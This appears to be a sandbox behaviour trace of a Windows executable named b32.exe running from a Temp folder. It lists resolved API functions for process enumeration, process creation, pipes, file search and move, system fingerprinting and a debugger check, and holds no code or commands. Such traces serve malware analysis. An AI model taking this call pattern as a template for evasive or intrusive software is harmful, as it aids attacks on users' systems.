Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7606424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x760646b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76076676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76064751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x760765f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x760647c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x760647e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x760647f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75ffeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 260 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75fe49d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75fe1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75fe435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75fe186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75fe3519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75ffd802 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fe1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75fe1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75fe1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75fe10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75fe4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75fe3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77e8d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75fe11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75fe1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75fe7a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75fe1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75fe1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fe11f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75fe1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75fe49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75fe1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75fe7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75fe34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76007aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x75ffc807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x75fe435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75fe195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x7606454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75fe1328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76087bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75fe469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x75fe51a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75fe11a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75fe1450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77e70fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77e69d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75fe4a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75fe192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75fe170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fe14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x75fe51b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75fe3531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77e645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75fe4d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x75fe14b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75fe1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75fe1725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75fe3509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x75fe51e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x75fe51cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fe4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fe5235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7600772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x75fe87c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75fe1916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75ffd802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x75fe49ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x75fe11e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x75fe14fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75fe3587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75fe34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77e522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77e52270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fe14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75fe4493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x75fe179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7600d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75fe5189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x75fe495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7600d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77e5e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77e71f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75fe1946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77e63002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x75fe17b9 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x763e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x76402175 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x763f9679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x763ffc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x76402320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x763f7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x763f78e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x763f7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x763f787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x7641f170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x763fb17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x763f8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x763f9a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x76400dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x764502bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x76403559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x764020ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x763f6ffe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x763f8332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x763f90d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x763f9785 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x77e76d39 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x71060000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7107c544 True 1
Fn
System Get Time type = System Time, time = 2018-05-11 13:20:42 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75fe4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75fe359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75fe1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75fe4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75fe4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x7606410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76064195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75fed31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75ffee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77e7441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77e9c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77e9c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75fff088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77e805d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77e9ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77e50b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77f0fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77ea1e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76064761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x7605cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7606424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x760646b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76076676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76064751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x760765f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x760647c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x760647e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x760647f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75ffeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\b32.exe, size = 256 True 2
Fn
System Sleep duration = 200 milliseconds (0.200 seconds) True 1
Fn
Module Get Handle module_name = c:\users\5p5nrg~1\appdata\local\temp\b32.exe, base_address = 0x400000 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x763e0000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77e30000 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x763e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsMenu, address_out = 0x76405cb1 True 1
Fn
Window Set Attribute index = 0, new_long = 825373492 False 1
Fn
Window Create class_name = ExtraWnd1, wndproc_parameter = 0 True 1
Fn
Window Create class_name = ExtraWnd2, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 5
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75fe10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75ffd802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x75ffd423 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75fe4220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77e645f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75fe2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75fe4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75fe103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x75ff195c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76002b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75fe192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x7606415b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76008baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7600896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7600735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77e52270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75fe1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75fe4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75fe1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75fe5929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75ff9af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75fe4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75fe54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75ffd4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75ff10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75fedd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75fe7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x75fe43e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75ffc860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75fe49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75fe5063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75fe1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77e62c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75fe1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x77ea92b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75fe418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7600828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fe5235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75ffd5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x75fe1909 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75fe1700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77e8d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75fe3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75fe4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75fe1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75fe34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75fe1826 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x75fe18f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x75fe196e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75fe1b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76002a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75fe1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75fe1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75fe1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fe14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fe14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75fe424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76003102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75fe11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x75ffc807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x75fe168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75fe5558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75ffd4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x75fe1b80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x75fe588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fe110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75fe3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75fe3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75fe186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x75fff7aa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75fe34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fe1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77e5e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fe5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77e522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75fe7a10 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x763e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x764025cf True 1
Fn
